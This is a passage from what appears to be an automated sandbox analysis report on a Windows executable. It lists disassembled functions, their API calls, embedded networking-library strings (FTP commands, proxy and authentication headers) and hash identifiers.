                              • Part of subcall function 00007FF7F1DAE9C8: __sys_nerr.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAE9FB
                              • Part of subcall function 00007FF7F1DAE9C8: __sys_errlist.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAEA05
                              • Part of subcall function 00007FF7F1DAE9C8: strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DAEA18
                              • Part of subcall function 00007FF7F1DAE9C8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAEAA8
                              • Part of subcall function 00007FF7F1DAE9C8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAEAB3
                              • Part of subcall function 00007FF7F1DAE9C8: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAEABC
                              • Part of subcall function 00007FF7F1DAE9C8: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAEAC8
                            • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DB32A1
                            • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DB32A9
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: _errno$ErrorLast$__sys_errlist__sys_nerrgetpeernamestrncpy
                            • String ID: getpeername() failed with errno %d: %s$ssrem inet_ntop() failed with errno %d: %s
                            • API String ID: 1595226642-4047410615
                            • Opcode ID: 3935a7dc25cb01853878d93bc9c5b6711891ab3ee3726f6dfd06770b26f74baa
                            • Instruction ID: 4adfb0cce7de6e08166d6436adc0bc0b57096490e866d1e4caf718a654d7ca95
                            • Opcode Fuzzy Hash: 3935a7dc25cb01853878d93bc9c5b6711891ab3ee3726f6dfd06770b26f74baa
                            • Instruction Fuzzy Hash: ED219522B1868292FB24FB15E4407E9A370BF88B85FC04035E95E077D5DFACE505D7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: _strdupfree$PathSearch
                            • String ID: curl-ca-bundle.crt
                            • API String ID: 4109318298-694051528
                            • Opcode ID: b49543137be32970d793e18ebee1d1012d02deb88f2d5d3c8d23ded886a85623
                            • Instruction ID: fc7f9cb00aeaa5dcb5c5540d460647adab5416fe34719e6c94a75d3ddb8752c8
                            • Opcode Fuzzy Hash: b49543137be32970d793e18ebee1d1012d02deb88f2d5d3c8d23ded886a85623
                            • Instruction Fuzzy Hash: BD217436708B8192E715DB61F4442AAB7B4FB48780FC44135DA9D47B99DF7CD411C790
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: __swprintf_l
                            • String ID: LIST$NLST$PRET %s$PRET RETR %s$PRET STOR %s
                            • API String ID: 1488884202-294979158
                            • Opcode ID: 5afb022be6587c34c4eaa926b2997684ed590efcb9889b4dbdfa91b3d086748a
                            • Instruction ID: b70bb08ed5af42c8b75eb407473e2bd91d31fe2f21f814039c122ef871d4763b
                            • Opcode Fuzzy Hash: 5afb022be6587c34c4eaa926b2997684ed590efcb9889b4dbdfa91b3d086748a
                            • Instruction Fuzzy Hash: 3C216FA1E0C687A1FB54AB6884457F9F7B09F01B48FD84036C52D471D1CFADA549C7E1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: _scwprintf
                            • String ID: #HttpOnly_$%s%s%s%s%s%s%I64d%s%s$FALSE$TRUE$unknown
                            • API String ID: 1992661772-3622669638
                            • Opcode ID: fc343e6c086d41137686d84e63e98fad484ebc05623bfdad24137c06067b3214
                            • Instruction ID: fbc336da1246ebddf9f41c2746e94963d7055a0f2d3195bf7c7131aeb9da8cd5
                            • Opcode Fuzzy Hash: fc343e6c086d41137686d84e63e98fad484ebc05623bfdad24137c06067b3214
                            • Instruction Fuzzy Hash: 7B21AE62608B8591EB41DB04E9443A8B7F0F705B84FD84035DA6D077A4DFBCD9A5C790
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID:
                            • String ID: Request has same path as previous transfer$Uploading to a URL without a file name$path contains control characters
                            • API String ID: 0-4131979473
                            • Opcode ID: 8800b3d9de597adc8fb589d90272528016c92edfafc2870e6cb19615b1a0b206
                            • Instruction ID: 96832cba3b75b01fafe51be66b9ef6009e0bdcc955cbcac6811b67c9e0f280f4
                            • Opcode Fuzzy Hash: 8800b3d9de597adc8fb589d90272528016c92edfafc2870e6cb19615b1a0b206
                            • Instruction Fuzzy Hash: 27917925E0878692EB58AB2594502B9B7B0FB49B84F844035CE6E073D4DFBDE45983E1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: tolower
                            • String ID: ALL_PROXY$Uses proxy env variable %s == '%s'$_proxy$all_proxy$http_proxy
                            • API String ID: 3025214199-127164392
                            • Opcode ID: 0ff445e987f6f2f59b3ac461c031a8cb0d0bb56be4954b269ca301acc5c1ab6b
                            • Instruction ID: c8d6e0bbf3cdac1e3beddfc8d0990ec4087f0104657547efb33cc08a255798a7
                            • Opcode Fuzzy Hash: 0ff445e987f6f2f59b3ac461c031a8cb0d0bb56be4954b269ca301acc5c1ab6b
                            • Instruction Fuzzy Hash: 0731B321A0C78690EB18EB15A4502B9F7A4BF19B88FC44135DAAD177C6DF6CE105C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00000000,?,00007FF7F1DB70B8,?,?,?,00007FF7F1DB7462), ref: 00007FF7F1DBED0F
                            • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00007FF7F1DB70B8,?,?,?,00007FF7F1DB7462), ref: 00007FF7F1DBED22
                            • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,00007FF7F1DB70B8,?,?,?,00007FF7F1DB7462), ref: 00007FF7F1DBED2F
                            • WaitForSingleObjectEx.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00007FF7F1DB70B8,?,?,?,00007FF7F1DB7462), ref: 00007FF7F1DBED42
                            • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,00007FF7F1DB70B8,?,?,?,00007FF7F1DB7462), ref: 00007FF7F1DBED4B
                            • closesocket.WS2_32 ref: 00007FF7F1DBED7C
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: CloseCriticalHandleSection$EnterLeaveObjectSingleWaitclosesocket
                            • String ID:
                            • API String ID: 817826440-0
                            • Opcode ID: 565021a328bc0089918e49ed5a3a620139350b21e882a4a8f3d53f21cbfe40a4
                            • Instruction ID: 61ad6a1d10e774c38a97783cb7e3b97588385b0e94dbf208b2452e0f2fe063bd
                            • Opcode Fuzzy Hash: 565021a328bc0089918e49ed5a3a620139350b21e882a4a8f3d53f21cbfe40a4
                            • Instruction Fuzzy Hash: 36214A36608A0286E714EF16E444329B370FB88B91F844531DF6E07B94CFBCE06593A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 00007FF7F1DA3014: QueryPerformanceCounter.API-MS-WIN-CORE-PROFILE-L1-1-0(?,?,?,?,00007FF7F1D910B6), ref: 00007FF7F1DA3026
                            • _time64.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FF7F1D9EE38
                              • Part of subcall function 00007FF7F1DAA914: WSACreateEvent.WS2_32 ref: 00007FF7F1DAAA20
                            • __swprintf_l.LIBCMT ref: 00007FF7F1D9EF8F
                            Strings
                            • Transfer aborted due to critical error in another transfer, xrefs: 00007FF7F1D9EF88
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: CounterCreateEventPerformanceQuery__swprintf_l_time64
                            • String ID: Transfer aborted due to critical error in another transfer
                            • API String ID: 471582966-1939301410
                            • Opcode ID: 8187df35cc7149b8d1dc9998055b10c9ad8102b1a899c8a673c037babb31b8a9
                            • Instruction ID: 46851cba9a7be33a60330671edf56823c806444329146e36a1cf4792130e6b67
                            • Opcode Fuzzy Hash: 8187df35cc7149b8d1dc9998055b10c9ad8102b1a899c8a673c037babb31b8a9
                            • Instruction Fuzzy Hash: A9B10362B0869289FB58EB6194403BDABF5BB45B84FC40135DE6E13BD9DFB8D444C3A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: _scwprintf
                            • String ID: %sAuthorization: Negotiate %s$Curl_output_negotiate, no persistent authentication: cleanup existing context$Negotiate$Proxy-
                            • API String ID: 1992661772-1255959952
                            • Opcode ID: c7dd1c4233c09f985ab34f5be077910d327cf100838846418c45d0b36795a113
                            • Instruction ID: 409fb0c79ee8c33ebb57612415f96ed79f33196574a7dde2bcb0957d5852aafe
                            • Opcode Fuzzy Hash: c7dd1c4233c09f985ab34f5be077910d327cf100838846418c45d0b36795a113
                            • Instruction Fuzzy Hash: 2B61C332A496C189FB18EF24D4943B9B7A0EB02B88F840535CA7E472D0CFBDE445C7A4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: _scwprintfstrtol
                            • String ID: %s%s%s$Connecting to hostname: %s$Connecting to port: %d
                            • API String ID: 3295852271-253970900
                            • Opcode ID: 668f76038874af4a03a387691c72402cc44d9f84beb9ac7e2e113d5bfe7bb024
                            • Instruction ID: d0eef048692fb93d6b0af563a19c6d3f772dd6de5329a6090b4fd96bc6146020
                            • Opcode Fuzzy Hash: 668f76038874af4a03a387691c72402cc44d9f84beb9ac7e2e113d5bfe7bb024
                            • Instruction Fuzzy Hash: E151F561A0CA8291EB25EB19E4003AAE7A0FB857D4FC44135DEBE076D4DFBCE505C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: __swprintf_l$_strdup
                            • String ID: %0*lu$internal error: invalid pattern type (%d)
                            • API String ID: 3016644273-449433499
                            • Opcode ID: 700e0c9ed3a70d8c7bc352b7ac74fef6bd43bfcd5db43767ff772a170a3355fd
                            • Instruction ID: 55b69ee590da4cd6dbd7c03f07a698adff2a2fa168408151d3ad9b3dd64e6697
                            • Opcode Fuzzy Hash: 700e0c9ed3a70d8c7bc352b7ac74fef6bd43bfcd5db43767ff772a170a3355fd
                            • Instruction Fuzzy Hash: 1A51E322A0968186EB55EB19C10477CAB70FB00B54FA84635CA7C077D7CFACE44393E0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: __swprintf_l
                            • String ID: RETR %s$SIZE %s
                            • API String ID: 1488884202-1273946937
                            • Opcode ID: 47222ed69264df7e803e69610e1eed05c0d9eed1612d7b994bf5c3e01cf96f64
                            • Instruction ID: b15189993d3395695b6b325bcabdb400ff027c9f47045ffebcc1a96f59fa84b4
                            • Opcode Fuzzy Hash: 47222ed69264df7e803e69610e1eed05c0d9eed1612d7b994bf5c3e01cf96f64
                            • Instruction Fuzzy Hash: 8C51B3F2F08782A1EB589B2595116B8F7B0EB04B94F894135D92E477D4DFBCE850C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 00007FF7F1D93E4C: __stdio_common_vsscanf.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F1D93E89
                            • strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,?,?,?,00000000,?,00007FF7F1DA96CD), ref: 00007FF7F1DA8C51
                            • __swprintf_l.LIBCMT ref: 00007FF7F1DA8C84
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: __stdio_common_vsscanf__swprintf_lstrtol
                            • String ID: %*[^]]%c%n$%ld$[%*45[0123456789abcdefABCDEF:.]%c%n
                            • API String ID: 1923824951-723072255
                            • Opcode ID: f37293afbeaf3290feb175d0a071532349a716ed9b291873fcbc9302f12e8e8e
                            • Instruction ID: 695770c312356afe0a9c9e007cacf1512f9008d73c2d1abcf3488bfe374fcac5
                            • Opcode Fuzzy Hash: f37293afbeaf3290feb175d0a071532349a716ed9b291873fcbc9302f12e8e8e
                            • Instruction Fuzzy Hash: 2141B062F09A4285FB51EB66D8402F8A7B0AB45749FC44432CE6D573CADFBCE442C7A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: _scwprintf
                            • String ID: GMT$%.4s-%.2s-%.2s %.2s:%.2s:%c%c%s%.*s%s%.*s$9$Z
                            • API String ID: 1992661772-2608029019
                            • Opcode ID: c1077b3ccae57067c110648133ca7f87c2de0f9f8eaa3cbc6c890597d80ee4d6
                            • Instruction ID: d1ef7131ce1fa31803a6b2c0c6943eebe4356d28f68cce29829104b812b3629d
                            • Opcode Fuzzy Hash: c1077b3ccae57067c110648133ca7f87c2de0f9f8eaa3cbc6c890597d80ee4d6
                            • Instruction Fuzzy Hash: 5041D221A0C68599EF55DF20E8541B9F7B4EB04791F948032DAAC03B98CFBCE542C7D1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: __swprintf_l_scwprintf
                            • String ID: %s%s%s$LIST$NLST
                            • API String ID: 1487745932-959297966
                            • Opcode ID: 56e1939dd89dede072d4afb5a57cd00bbe0e8d4216f1c1d366f68ea2c5a5a4a4
                            • Instruction ID: b37e1ac87598d7b9f65fb0c32bbb03ca00387a14cde6b6f170bba46dc16d5f7b
                            • Opcode Fuzzy Hash: 56e1939dd89dede072d4afb5a57cd00bbe0e8d4216f1c1d366f68ea2c5a5a4a4
                            • Instruction Fuzzy Hash: 92319D61A0868285EB04EB15E9442B9F3B0EB44BC5FD84032CE2D477D4DFBCE50687A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: _scwprintffree
                            • String ID: %s%s$%s/%s$://
                            • API String ID: 4183154275-3147304931
                            • Opcode ID: 5d6d62b624624992e386610f0545070121ca700efaae0c3f0445f1a2afe1afbf
                            • Instruction ID: e6193c40720526a092b08341753d48f1eb93448ef1e88d80d408657f682ab26b
                            • Opcode Fuzzy Hash: 5d6d62b624624992e386610f0545070121ca700efaae0c3f0445f1a2afe1afbf
                            • Instruction Fuzzy Hash: 41217F11B0E64755FF19BB12A9102BAD6A1AF45BC1FDC8430DE2D07BD6EFACE40143A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: __swprintf_l
                            • String ID: %s %s$LIST$RETR
                            • API String ID: 1488884202-469064825
                            • Opcode ID: b272378348c2e77e80093bf10d52b766103b6ddbaf5760a7654218b70967d292
                            • Instruction ID: c73f5b5c21d2e1371691be96d91d055862faaf0cb5a4ba01a17a973d5b875f50
                            • Opcode Fuzzy Hash: b272378348c2e77e80093bf10d52b766103b6ddbaf5760a7654218b70967d292
                            • Instruction Fuzzy Hash: 0C31837290CBD281E750AF6994003A9B7B8EB15BD8F984132DA6D073D1DF79D412C790
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: __swprintf_l
                            • String ID: %2I64d:%02I64d:%02I64d$%3I64dd %02I64dh$%7I64dd
                            • API String ID: 1488884202-564197712
                            • Opcode ID: 387fad4af4828e61841ecabec197d1648980ef3d48d59ce15a855c2605f8d7ca
                            • Instruction ID: f936b911e25f6cd3a0a9e92a197e090c64a0e49cbec40b641fb76fa782bc004a
                            • Opcode Fuzzy Hash: 387fad4af4828e61841ecabec197d1648980ef3d48d59ce15a855c2605f8d7ca
                            • Instruction Fuzzy Hash: 15210BD5E04B8A46DF289758680179082B9A7D5BC0FC49132DD5C0B7E6EBAC63468291
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
